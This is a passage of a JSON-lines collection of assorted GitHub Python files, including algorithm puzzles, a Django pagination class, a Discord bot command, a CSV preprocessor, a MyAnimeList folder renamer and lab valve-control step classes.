requirements\n        towers = towers + [0]  # copy so the caller's list is not mutated\n        n = len(towers)\n        jumps = [0 for _ in range(n)]\n\n        if (n == 0) or (towers[0] == 0):\n            return False\n\n        jumps[0] = 0\n\n        for i in range(1, n):\n            jumps[i] = float('inf')\n            for j in range(i):\n                if (i <= j + towers[j]) and (jumps[j] != float('inf')):\n                    jumps[i] = min(jumps[i], jumps[j] + 1)\n                    
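# note: jumps[] is non-decreasing, so the first feasible j already gives the minimum - safe to stop early\n                    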
break\n\n if jumps[n-1] != float('inf'):\n print(\"hopping with {} numbers of jumps\".format(jumps[n-1]))\n return True\n else:\n return False\n\n\nif __name__ == \"__main__\":\n # seq = [4, 2, 0, 0, 2, 0]\n # seq = [1, 0]\n # seq = [4, 2, 0, 0, 2, 0, 7, 0, 3, 1, 0]\n # seq = [4, 2, 0, 0, 2, 0, 2, 0, 3, 1, 0]\n # seq = [4, 2, 0, 0, 2, 0, 2, 0, 1, 1, 0]\n # seq = [4, 2, 0, 0, 1, 0]\n seq = [1, 3, 6, 1, 0, 9]\n\n print(NativeSolution.is_hopable(seq))\n print(DynamicProgrammingSolution.is_hopable(seq))\n","repo_name":"avi3tal/knowledgebase","sub_path":"algo/problems/tower_hopper_problem.py","file_name":"tower_hopper_problem.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23471020991","text":"from queue import *\r\nfrom array import *\r\n\r\ndef reverse(a):\r\n return int(str(a)[::-1])\r\n\r\nf = open('A-small-attempt1.in', 'r')\r\nh = open('store.txt','r')\r\ng = open('output.txt', 'w')\r\n\r\nnum = int(f.readline())\r\nd = array('I',(0 for j in range(1000001)))\r\nfor k in range(1000001):\r\n d[k] = int(h.readline())\r\n \r\nfor i in range (num):\r\n N = int(f.readline())\r\n count = d[N]\r\n s = \"Case #\" + str(i+1) + \": \" + str(count) + '\\n'\r\n g.write(s)\r\n\r\nf.close()\r\ng.close()\r\nh.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_162/355.py","file_name":"355.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32138948746","text":"from collections import OrderedDict\n\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.response import Response\n\n\nclass PageSizeNumberPagination(PageNumberPagination):\n def get_paginated_response(self, data):\n return Response(OrderedDict([\n ('page_size', self.page_size),\n ('num_pages', self.page.paginator.num_pages),\n ('count', self.page.paginator.count),\n ('next', self.get_next_link()),\n ('previous', self.get_previous_link()),\n ('current_page_number', self.page.number),\n ('next_page_number', self.page.next_page_number() if self.page.has_next() else None),\n ('previous_page_number', self.page.previous_page_number() if self.page.has_previous() else None),\n ('results', data)\n ]))\n","repo_name":"night-crawler/reformogen","sub_path":"sample/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41147013621","text":"from objects.modulebase import ModuleBase\nfrom objects.permissions import PermissionEmbedLinks\nfrom objects.paginators import Paginator\n\nfrom discord import Embed, Colour\n\n\nclass Module(ModuleBase):\n\n usage_doc = '{prefix}{aliases}'\n short_doc = 'Get list of colors available for assigment'\n\n name = 'colors'\n aliases = (name, 'colours')\n category = 'Discord'\n bot_perms = (PermissionEmbedLinks(), )\n guild_only = True\n\n async def on_call(self, ctx, args, **flags):\n colors = await ctx.bot.pg.fetch(\n \"SELECT role_id FROM color_roles WHERE guild_id = $1\",\n ctx.guild.id\n )\n\n guild_roles = []\n missing_roles = []\n\n for c in colors:\n r = ctx.guild.get_role(c['role_id'])\n\n if r is None:\n missing_roles.append(c['role_id'])\n else:\n guild_roles.append(r)\n\n if missing_roles:\n await ctx.bot.pg.fetch(\n \"DELETE FROM color_roles WHERE guild_id = $1 AND role_id = ANY($2)\",\n ctx.guild.id, 
missing_roles\n            )\n\n        if not guild_roles:\n            return await ctx.info('No color roles')\n\n        guild_roles.sort(key=lambda x: x.position, reverse=True)\n\n        lines = [f'{r.color} | {r.name}' for r in guild_roles]\n        lines_per_chunk = 30\n        chunks = [f'``` color | role name\\n{\"-\" * 53}\\n' + '\\n'.join(lines[i:i + lines_per_chunk]) + '```' for i in range(0, len(lines), lines_per_chunk)]\n\n        p = Paginator(self.bot)\n        for i, chunk in enumerate(chunks):\n            e = Embed(\n                title=f'Available colors ({len(lines)})',\n                colour=Colour.gold(),\n                description=chunk\n            )\n            e.set_footer(text=f'Page {i + 1} / {len(chunks)}')\n            p.add_page(embed=e)\n\n        await p.run(ctx)\n","repo_name":"Fogapod/KiwiBot","sub_path":"modules/utils/module_colors.py","file_name":"module_colors.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"61"} +{"seq_id":"4234830863","text":"import re\nfrom .base_template import MarketPlaceTemplate\n\n\nclass CannaZoneParser(MarketPlaceTemplate):\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.parser_name = \"cannazone\"\n        self.list_name_xpath = '(//div[contains(@class, \"product-information\")])[1]/h2/text()'\n        self.vendor_xpath = '//div[contains(@class, \"product-information-vendor\")]//a[contains(@class, \"vendor_rating\")]/text()'\n        self.description_text_xpath = '(//div[contains(@class, \"product-details\")]//div[contains(@class, \"content\")])[1]//text()'\n        # main function\n        self.main()","repo_name":"ken2190/Enterprise-Forum-Scraper","sub_path":"templates/cannazone_template.py","file_name":"cannazone_template.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22134319643","text":"import pandas as pd\nimport os\n\nclass CsvPreprocessor: \n\n    @staticmethod\n    def prefix_file_name_of(from_path, prefix=\"Augmented_\"):\n        SEPARATOR = \"/\"\n        return prefix + from_path.split(SEPARATOR)[-1]\n\n    @staticmethod\n    def _get_df(file_path):\n        if(file_path is None):\n            return\n        \n        return pd.read_csv(file_path)\n\n    # returns path to which it saved file\n    @staticmethod\n    def _save_df(df, file_path, save_name):\n\n        if(save_name == None):\n            df.to_csv(file_path, header=True, index=False)\n            return file_path\n        else:\n            SEPARATOR = \"/\"\n            old_path = file_path.split(SEPARATOR)\n            new_path = SEPARATOR.join(old_path[:-1]) + \"/\" + save_name\n            df.to_csv(new_path, header=True, index=False)\n            return new_path\n    \n\n    # Drops rows which contain at least one null\n    # Returns file path to the saved file\n    @staticmethod\n    def drop_null_containing_rows(file_path, save_name=None): \n        df = CsvPreprocessor._get_df(file_path)\n        df = df.dropna() \n        return CsvPreprocessor._save_df(df, file_path, save_name)\n    \n\n    # Normalizes specified column values to [0,1] region\n    # Returns file path to the saved file\n    @staticmethod\n    def normalize_columns(file_path, save_name=None, normalize_columns=[\"year\", \"km\", \"kw\"]):\n        df = CsvPreprocessor._get_df(file_path)\n\n        if(normalize_columns != None):\n            for column_name in normalize_columns:\n                df[column_name] = (df[column_name] - df[column_name].min()) / (df[column_name].max() - df[column_name].min()) \n\n        return CsvPreprocessor._save_df(df, file_path, save_name)\n\n    # one hot encodes specified column values\n    # Returns file path to the saved file\n    @staticmethod\n    def one_hot_encode_columns(file_path, save_name=None, one_hot_columns=[\"trans\", \"fuel\"]): \n        df = 
CsvPreprocessor._get_df(file_path)\n\n        # One hot encode specified columns\n        for col_name in one_hot_columns:\n            # Get the one hot encoded columns\n            one_hot_encoded = pd.get_dummies(df[col_name])\n            # Drop the original column which we onehot encoded\n            df = df.drop(columns=col_name)\n\n            # Concatenate them together\n            df = pd.concat([df, one_hot_encoded], axis=1)\n\n        return CsvPreprocessor._save_df(df, file_path, save_name)\n    \n    # Adds the car whose price we will be predicting to the dataframe\n    # WARNING: Sets the car's price to None -> if we call this before \n    # drop_null_containing_rows our car will be dropped\n    @staticmethod\n    def add_car_to_predict(file_path, car_dict, save_name=None):\n        df = CsvPreprocessor._get_df(file_path)\n        SPECIAL_COLUMN_NAME = \"IsCarToPredict\"\n\n        # Add column which will make it stand apart from the rest of the dataset\n        car_dict[SPECIAL_COLUMN_NAME] = True\n\n        # Now add the same column to the rest of the dataset \n        # but with different value\n        df[SPECIAL_COLUMN_NAME] = False\n\n        # Now append the car to the augmented df\n        df = df.append(car_dict, ignore_index=True)\n\n        return CsvPreprocessor._save_df(df, file_path, save_name)\n    \n    # Takes the car to predict from the dataset and returns it with the file path,\n    # it also deletes column SPECIAL_COLUMN_NAME both from df and car\n    @staticmethod\n    def take_out_car_to_predict(file_path, save_name=None):\n        df = CsvPreprocessor._get_df(file_path)\n        SPECIAL_COLUMN_NAME = \"IsCarToPredict\"\n\n        car_df = df[df[SPECIAL_COLUMN_NAME]].drop(columns=[SPECIAL_COLUMN_NAME])\n        df = df[~df[SPECIAL_COLUMN_NAME]].drop(columns=[SPECIAL_COLUMN_NAME])\n\n        return CsvPreprocessor._save_df(df, file_path, save_name), car_df\n\n\n\n\"\"\"\ndef main():\n    # Usage example\n    sample_car = {\n        \"price\": None,\n        \"year\": 2014, \n        \"trans\": \"Automat\", \n        \"fuel\": \"Diesel\", \n        \"km\": 356000, \n        \"kw\": 77.0,\n    }\n    abs_path = \"C:/Users/samue/Desktop/Skola/others/CarCost/data/Audi_e-tron.csv\"\n    new_file_name = CsvPreprocessor.prefix_file_name_of(abs_path)\n\n    curr_path = CsvPreprocessor.drop_null_containing_rows(abs_path, new_file_name)\n    curr_path = CsvPreprocessor.add_car_to_predict(curr_path, sample_car)\n    curr_path = CsvPreprocessor.normalize_columns(curr_path)\n    curr_path = CsvPreprocessor.one_hot_encode_columns(curr_path)\n\n    curr_path, car_df = CsvPreprocessor.take_out_car_to_predict(curr_path)\n    print(car_df)\n    \n\nif __name__ == \"__main__\":\n    main()\n#\"\"\"","repo_name":"SamuelMintal/CarCost","sub_path":"src/csv_preprocessor.py","file_name":"csv_preprocessor.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7496985796","text":"from __future__ import print_function\nfrom utils import GuessArchitecture\narch = GuessArchitecture()\n\n# assume 64 bit unless set specifically\nprint(GuessArchitecture() \\\n    .replace('ia32', 'x64') \\\n    .replace('ppc', 'ppc64') \\\n    .replace('arm', 'arm64') \\\n    .replace('s390', 's390x'))\n","repo_name":"nodejs/node","sub_path":"tools/getarch.py","file_name":"getarch.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":99492,"dataset":"github-code","pt":"61"} +{"seq_id":"34140168871","text":"\"\"\"\r\nAuto Anime Folder Renamer\r\nSilverVeritas\r\n2-12-2021\r\n\r\nThis will rename folders in the current directory. It does this by:\r\n1. Looks at each folder in the current directory and cleans it up\r\n2. 
Searches MAL and scrapes the corresponding anime entry (Google searching was supported, but it can lead to getting\r\nrate limited (HTTPError 429) and prevents functionality)\r\n3. Adds a '~' to the end of the file name to mark that the file has been formatted\r\n4. Files that cannot be properly named are prefixed with an '@'\r\n5. If the wrong MAL link is found then enter 'n' and enter the correct MAL link\r\n\r\n⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣀⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠄⠄⠄⠄\r\n⠄⠄⠄⠄⠄⢀⣀⣀⡀⠄⠄⠄⡠⢲⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠄⠄\r\n⠄⠄⠄⠔⣈⣀⠄⢔⡒⠳⡴⠊⠄⠸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠿⣿⣿⣧⠄⠄\r\n⠄⢜⡴⢑⠖⠊⢐⣤⠞⣩⡇⠄⠄⠄⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣆⠄⠝⠛⠋⠐\r\n⢸⠏⣷⠈⠄⣱⠃⠄⢠⠃⠐⡀⠄⠄⠄⠄⠙⠻⢿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠸⠄⠄⠄⠄\r\n⠈⣅⠞⢁⣿⢸⠘⡄⡆⠄⠄⠈⠢⡀⠄⠄⠄⠄⠄⠄⠉⠙⠛⠛⠛⠉⠉⡀⠄⠡⢀⠄⣀\r\n⠄⠙⡎⣹⢸⠄⠆⢘⠁⠄⠄⠄⢸⠈⠢⢄⡀⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠃⠄⠄⠄⠄⠄\r\n⠄⠄⠑⢿⠈⢆⠘⢼⠄⠄⠄⠄⠸⢐⢾⠄⡘⡏⠲⠆⠠⣤⢤⢤⡤⠄⣖⡇⠄⠄⠄⠄⠄\r\n⣴⣶⣿⣿⣣⣈⣢⣸⠄⠄⠄⠄⡾⣷⣾⣮⣤⡏⠁⠘⠊⢠⣷⣾⡛⡟⠈⠄⠄⠄⠄⠄⠄\r\n⣿⣿⣿⣿⣿⠉⠒⢽⠄⠄⠄⠄⡇⣿⣟⣿⡇⠄⠄⠄⠄⢸⣻⡿⡇⡇⠄⠄⠄⠄⠄⠄⠄\r\n⠻⣿⣿⣿⣿⣄⠰⢼⠄⠄⠄⡄⠁⢻⣍⣯⠃⠄⠄⠄⠄⠈⢿⣻⠃⠈⡆⡄⠄⠄⠄⠄⠄\r\n⠄⠙⠿⠿⠛⣿⣶⣤⡇⠄⠄⢣⠄⠄⠈⠄⢠⠂⠄⠁⠄⡀⠄⠄⣀⠔⢁⠃⠄⠄⠄⠄⠄\r\n⠄⠄⠄⠄⠄⣿⣿⣿⣿⣾⠢⣖⣶⣦⣤⣤⣬⣤⣤⣤⣴⣶⣶⡏⠠⢃⠌⠄⠄⠄⠄⠄⠄\r\n⠄⠄⠄⠄⠄⠿⠿⠟⠛⡹⠉⠛⠛⠿⠿⣿⣿⣿⣿⣿⡿⠂⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄\r\n⠠⠤⠤⠄⠄⣀⠄⠄⠄⠑⠠⣤⣀⣀⣀⡘⣿⠿⠙⠻⡍⢀⡈⠂⠄⠄⠄⠄⠄⠄⠄⠄⠄\r\n⠄⠄⠄⠄⠄⠄⠑⠠⣠⣴⣾⣿⣿⣿⣿⣿⣿⣇⠉⠄⠻⣿⣷⣄⡀⠄⠄⠄⠄⠄⠄⠄⠄\r\n\"\"\"\r\nimport os\r\nimport re\r\nimport time  # stdlib time module; the original \"from datetime import time\" import has no sleep()\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs\r\nfrom googlesearch import search\r\nfrom urllib.error import HTTPError\r\n\r\n\r\ndef clean(FileName):\r\n    FileName = re.sub(\"\\[.*?\\]\", \"\", FileName)\r\n    return FileName\r\n\r\n\r\ndef search_google(anime_name):\r\n    # SearchResults = search(\"MyAnimeList \" + anime_name + \" -nyaa.si\", num_results=2)\r\n    # search() may return a generator, so materialise it before indexing\r\n    SearchResults = list(search(\"site:myanimelist.net \" + anime_name + \" -nyaa.si\", num_results=2))\r\n    print(SearchResults)\r\n    return SearchResults[0]\r\n\r\n\r\ndef search_mal(anime_name):\r\n    searcher = 'https://myanimelist.net/anime.php?q='\r\n    searcher = searcher + anime_name\r\n    mal = requests.get(searcher)\r\n    soup = bs(mal.content, features=\"html.parser\")\r\n    a = soup.find_all(\"a\")\r\n    target = str(a[90])\r\n    target = re.findall(r'(https?://[^\\s]+)', target)\r\n    target = str(target)\r\n    target = target[2:-8]\r\n    return target\r\n\r\n\r\ndef clean_html(raw_html):\r\n    cleanr = re.compile('<.*?>')\r\n    cleantext = re.sub(cleanr, '', raw_html)\r\n    return cleantext\r\n\r\n\r\ndef find_Title(url):\r\n    mal = requests.get(url)\r\n    soup = bs(mal.content, features=\"html.parser\")\r\n    h1 = soup.find_all(\"h1\")[0]\r\n    japName = clean_html(str(h1))\r\n    p = soup.find_all(\"p\")[0]\r\n    EnName = clean_html(str(p))\r\n    illegal = ['*', '.', '\"', \"\\\\\", '/', '[', ']', ':', ';', '|', ',', '?']\r\n    for char in illegal:\r\n        japName = japName.replace(char, '')\r\n        EnName = EnName.replace(char, '')\r\n\r\n    if (len(EnName) > 100):\r\n        return japName, \"NO ALT NAME\"\r\n    return japName, EnName\r\n\r\n\r\ndef name_format(jName, eName):\r\n    if (eName == \"NO ALT NAME\"):\r\n        return jName+\"~\"\r\n    return f'{jName} ({eName})~'\r\n\r\n\r\ndef main(file):\r\n    cleaned = clean(file)\r\n    print(f\"\\nThe current file is {file}\")\r\n    Result = search_mal(cleaned)\r\n    userInp = ''\r\n    correct = ''\r\n    while userInp not in ['y', 'n']:\r\n        userInp = input(f'Is this the correct link? (y,n)\\n{Result}\\n')\r\n\r\n    if userInp == 'n':\r\n        print(\"Do this manually. MAL returned unexpected result.\")\r\n        print('Enter correct MAL link.')\r\n        correct = input()\r\n        print()\r\n        Result = correct\r\n\r\n    t = find_Title(Result)\r\n    name = name_format(t[0], t[1])\r\n\r\n    userInp = ''\r\n    while userInp not in ['y', 'n']:\r\n        userInp = input(f'Is this the correct name? (y,n)\\n{name}\\n')\r\n\r\n    if userInp == 'n':\r\n        print(\"Do this manually. 
Name will not be changed.\")\r\n        return\r\n\r\n    return name\r\n\r\n\r\n# Change the current directory here\r\ndirectory = r\"Z:\\Downloads\\completed\"\r\n\r\nos.chdir(directory)\r\ni = 0\r\nx = []\r\nfor f in os.listdir():\r\n    x.append(f)\r\n\r\nfor file in x:\r\n    if os.path.isdir(file):\r\n        try:\r\n            currFile = file\r\n            if currFile[-1:] == '~':\r\n                print(f'File was not changed: {currFile}')\r\n                print(\"~\" * 50)\r\n                continue\r\n            newName = main(file)\r\n            os.rename(file, newName)\r\n            print(f'File name change:\\n{currFile}\\n{newName}')\r\n            print(\"~\"*50)\r\n\r\n        except HTTPError as h:\r\n            # HTTPError must be caught before the generic Exception handler, otherwise this branch is unreachable\r\n            time.sleep(5)\r\n            print(\"Dang we fucked up fam.\")\r\n        except Exception as e:\r\n            print(\"You made a fucky wucky.\")\r\n            print(e)\r\n            print('Adding a marker')\r\n            os.rename(file, '@' + file)\r\n\r\n    else:\r\n        print(f'\"\\n{file}\" is not a folder.')\r\n","repo_name":"SilverVeritas/FileRenaming","sub_path":"Rename.py","file_name":"Rename.py","file_ext":"py","file_size_in_byte":5649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18239654259","text":"from datasets import load_dataset\nimport json\nimport os\n\ndataset = load_dataset(\"jayantdocplix/medical_dataset_chat\", \"main\")\n\ndataset_splits = {\"train\": dataset[\"train\"], \"test\": dataset[\"test\"]}\nprint(dataset_splits)\n\n\ndef main():\n    if not os.path.exists(\"data_med\"):\n        os.mkdir(\"data_med\")\n\n    with open(\"data_med/tokens.json\", \"w\") as f:\n        tokens = {}\n        tokens[\"tokens\"] = [\"\", \"\", \"\", \"\"]\n        f.write(json.dumps(tokens))\n\n    for key, ds in dataset_splits.items():\n        with open(f\"data_med/{key}.jsonl\", \"w\") as f:\n            for item in ds:\n                newitem = {}\n                newitem[\"input\"] = (\n                    f\"{item['input']}\"\n                    f\"{item['answer_chatdoctor']}\"\n                )\n                f.write(json.dumps(newitem) + \"\\n\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"yuanconghao/llama2-finetuning","sub_path":"create_dataset_medical.py","file_name":"create_dataset_medical.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"3052169743","text":"#MIT License\r\n#\r\n#Copyright (c) 2017 Jonathan A. White\r\n#\r\n#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n#\r\n#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n#\r\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n\r\n\r\nfrom Step import Step\r\nfrom LabelEntry import LabelEntry\r\ntry:\r\n from Tkinter import * #python 2.7\r\nexcept:\r\n from tkinter import * #python 3\r\nfrom ValveController import ValveController\r\n\r\n# ValveSteps are Steps in a Routine that open or close valves.\r\nclass ValveStep(Step):\r\n parameter = \"Open/close valve\" # this text is included in add step dialog boxes.\r\n\r\n # ValveStep.__init__: intializes ValveStep\r\n # Input:\r\n # _super - parent Tkinter frame object in which to draw ValveStep instance\r\n # Output: None\r\n def __init__(self, _super):\r\n Step.__init__(self, _super)\r\n self.Valve = LabelEntry(self.box, 0, 0, \"Valve:\", width = 16)\r\n self.Valve.expression = False\r\n self.State = LabelEntry(self.box, 0, 2, \"State:\", width = 16)\r\n self.State.expression = False\r\n self.entries = [self.Valve, self.State]\r\n self.steptype = \"ValveStep\"\r\n\r\n # ValveStep.run: executes valve opening and closing\r\n # Inputs:\r\n # cleanup - does nothing for this class. Accepted as an argument because routines pass it to every object in\r\n # their steps list. Other Step derivatives and loops use it.\r\n # iter - tuple of loop iterations. None if the step is not inside a loop. The iteration of the immediate loop\r\n # is stored in i[0], the first outer loop in i[1], and the nth outer loop in i[n].\r\n # Output: None\r\n def run(self, cleanup = None, iter = None):\r\n valves = []\r\n states = []\r\n for j in range(len(self.Valve.saved)):\r\n i = iter\r\n if self.Valve.expression:\r\n valves.append(eval(self.Valve.saved[j], {}, {'i' : i}))\r\n else:\r\n valves.append(int(self.Valve.saved[j]))\r\n if self.State.expression:\r\n states.append(eval(self.State.saved[j], {}, {'i' : i}))\r\n else:\r\n states.append(int(self.State.saved[j]))\r\n if states[-1] == 1:\r\n Step.btndict[valves[-1]].config(bg=\"green\")\r\n else: # the saved state is 0\r\n Step.btndict[valves[-1]].config(bg=\"gray\")\r\n self.setValves(valves, states)\r\n Step.pause(self, 0)\r\n self.checkIfCancel()\r\n\r\n # ValveStep.saveEntries: save user entries for running or writing to file\r\n # Inputs:\r\n # type - data type that entries should be. Valve entries should be ints.\r\n # iters - tuple of loop iterations. None if the step is not inside a loop. 
The iteration of the immediate loop\r\n # is stored in i[0], the first outer loop in i[1], and the nth outer loop in i[n].\r\n def saveEntries(self, type=\"int\", iters=None):\r\n stateEntry = self.State.get()\r\n valveEntry = self.Valve.get()\r\n\r\n #first check if inputs are list, then check each entry\r\n stateEntry = stateEntry.replace(' ', '') #remove spaces\r\n states = tuple(stateEntry.rsplit(','))\r\n valves = tuple(valveEntry.rsplit(','))\r\n\r\n\r\n if len(set(valves)) < len(valves):\r\n raise ValueError(\"There are duplicate pin entries.\")\r\n\r\n if len(states) != len(valves):\r\n if len(states) == 1:\r\n states = tuple(list(states)*len(valves))\r\n else:\r\n raise ValueError(\"The number of valves and states entered in Valve Step are different.\")\r\n\r\n self.Valve.expression = [0]*len(states)\r\n self.State.expression = [0]*len(states)\r\n\r\n # check that all entries are valid\r\n for i in range(len(states)):\r\n self.checkValveStateEntry(valves[i], states[i], iters, listNum = i)\r\n\r\n #Save Entries\r\n self.State.saved = states\r\n self.Valve.saved = valves\r\n\r\n # ValveStep.checkValveStateEntry: Checks whether entries are valid. If step is in a loop and has an expression\r\n # That evaluates as a function of the loop iteration, recursively checks if it is valid for all loop iterations.\r\n # Inputs:\r\n # valve - user valve entry\r\n # state - user state entry\r\n # iters - tuple of loop iterations. None if the step is not inside a loop. The iteration of the immediate loop\r\n # is stored in i[0], the first outer loop in i[1], and the nth outer loop in i[n].\r\n # listNum - the position in the comma separated list of user entered valves/states.\r\n def checkValveStateEntry(self, valve, state, iters, listNum = None):\r\n if not iters: # just look for integers\r\n try:\r\n valve1 = int(valve)\r\n except:\r\n raise ValueError(valve + \" is not an available valve. Available valves are \"\r\n + self.btndict[\"AvailablePinsStatement\"] + \".\")\r\n if valve1 not in self.btndict:\r\n raise ValueError(valve + \" is not an available valve. Available valves are \"\r\n + self.btndict[\"AvailablePinsStatement\"] + \".\")\r\n if state not in (\"0\", \"1\"):\r\n raise ValueError(\"Valve state \" + state +\" is not allowed. \"\r\n \"The valve state must be either 1 (energized) or 0 (not energized).\")\r\n self.setEntryExpressionBool(listNum, False, False)\r\n return\r\n\r\n try:\r\n valve = int(valve)\r\n valveIsInt = True\r\n except:\r\n valveIsInt = False\r\n if valveIsInt:\r\n if valve not in self.btndict:\r\n raise ValueError(\"Valve \" + str(valve) + \" is not available. 
Available valves are \"\r\n + self.btndict[\"AvailablePinsStatement\"])\r\n if valveIsInt and state in (\"0\",\"1\"):\r\n self.setEntryExpressionBool(listNum, False, False)\r\n return\r\n elif state in (\"0\", \"1\"): #then either the valve entry is an expression or an error\r\n self.recursiveIterCheck(iters, valve, self.checkValidValveEntry, ())\r\n self.setEntryExpressionBool(listNum, True, False)\r\n elif valveIsInt: # Either the state entry is a correct python expression or an error\r\n self.recursiveIterCheck(iters, state, self.checkValidStateEntry, ())\r\n self.setEntryExpressionBool(listNum, False, True)\r\n else: #Both the state and valve entries are either expressions or errors\r\n self.recursiveIterCheck(iters, state, self.checkValidStateEntry, ())\r\n self.recursiveIterCheck(iters, valve, self.checkValidValveEntry, ())\r\n self.setEntryExpressionBool(listNum, True, True)\r\n\r\n # ValveStep.setEntryExressionBool: Sets whether each user entered state/valve is an expression or hard value.\r\n # Inputs:\r\n # entry - position in the user entered comma-separated list of valves/states.\r\n # valveExprBool - 1 if expression, 0 if not\r\n # stateExprBool - 1 if expression, 0 if not\r\n # Outputs: None\r\n def setEntryExpressionBool(self, entry, valveExprBool, stateExprBool):\r\n self.State.expression[entry] = stateExprBool\r\n self.Valve.expression[entry] = valveExprBool\r\n\r\n # ValveStep.checkValidValveEntry: Evaluates an expression for a valve entry with given loop iterations and checks\r\n # whether it is valid.\r\n # Inputs:\r\n # valve - expression for a valve\r\n # i - tuple of the iterations of all loops in which the valve step is nested inside.\r\n # Outputs: None, but raises error if the valve entry is invalid at the given loop iterations.\r\n def checkValidValveEntry(self, valve, i):\r\n try:\r\n valve1 = eval(valve, {}, {'i': i})\r\n print(i, valve1)\r\n except Exception as E:\r\n self.checkIfHasi(valve)\r\n raise ValueError(\"Valve entry must either be an available valve or a valid python expression \"\r\n \"evaluating to an available valve. Available valves are \"\r\n + self.btndict[\"AvailablePinsStatement\"] + \". \" + Step.NestingRuleStatement)\r\n if valve1 not in self.btndict:\r\n raise ValueError(\"Valve entry \" + valve + \" evaluates to \" + str(valve1) + \" on iteration \"\r\n + self.iterToString(i) + \". Available valves are \" + self.btndict[\r\n \"AvailablePinsStatement\"])\r\n\r\n # ValveStep.checkValidStateEntry: Evaluates an expression for a state entry with given loop iterations and checks\r\n # whether it is valid.\r\n # Inputs:\r\n # ste - expression for a state\r\n # i - tuple of the iterations of all loops in which the valve step is nested inside.\r\n # Outputs: None, but raises error if the state entry is invalid at the given loop iterations.\r\n def checkValidStateEntry(self, state, i):\r\n try:\r\n state = eval(state,{}, {'i':i})\r\n except:\r\n self.checkIfHasi(state)\r\n raise ValueError(\"Valve state \" + state +\" is not allowed. \"\r\n \"State entries for valve steps must either be 1 (energized), 0 (denergized)\"\r\n \" or, if in a loop, a python expression evaluating to 0 or 1.\" + Step.NestingRuleStatement)\r\n if state not in (0, 1):\r\n raise ValueError(\"State entries for valve steps must either be 1 (energized), 0 (denergized),\"\r\n \" or a python expression evaluating to 1 or 0. 
For interation \" + self.iterToString(i)\r\n +\" the expression evaluates to \" + str(state) + \".\")\r\n\r\n # ValveStep.setValves: Sends a serial command through a ValveController object to set valve states. Set upon\r\n # ValveController object's initialization in the KATARAGUI.connect method.\r\n # Inputs:\r\n # valve - tuple of valves to set the state of\r\n # state - tuple of states to set corresponding valves to.\r\n # Output: None\r\n def setValves(self, valve, state):\r\n raise NotImplementedError(\"Error: ValveStep.setValve must be set upon initialization of the device.\")\r\n\r\n# PumpSteps are steps in a Routine that run peristaltic pumping sequences.\r\nclass PumpStep(Step):\r\n parameter = \"Pump\"\r\n\r\n # PumpStep.__init__\r\n # Input:\r\n # _super - parent Tkinter frame object in which to draw ValveStep instance\r\n # Output: None\r\n def __init__(self, _super):\r\n Step.__init__(self, _super)\r\n self.box.config(text = \"Pump\")\r\n self.rate = LabelEntry(self.box, 0, 0, \"Rate (cycles/s):\", width = 3)\r\n self.nCycles = LabelEntry(self.box, 0, 2, \"Number of Cycles:\", width = 9)\r\n self.steptype = \"PumpStep\"\r\n\r\n valvesbox = LabelFrame(self.box)\r\n valvesbox.grid(row = 1, column = 0, columnspan = 10)\r\n self.valveEntries = []\r\n for valve in (1,2,3):\r\n self.valveEntries.append(LabelEntry(valvesbox, 1, 2*valve, \" --> Valve \" + str(valve) + \": \", width = 2))\r\n self.entries = [self.rate, self.nCycles]+ self.valveEntries\r\n\r\n # PumpStep.saveEntries: Saves user entered entries in PumpStep for running or writing to saved file. If there are\r\n # Expressions that evaluate as a function of loop iteration, all loop iterations are checked recursively.\r\n # Inputs:\r\n # type - data type the user entries should be, for PumpStep, should be 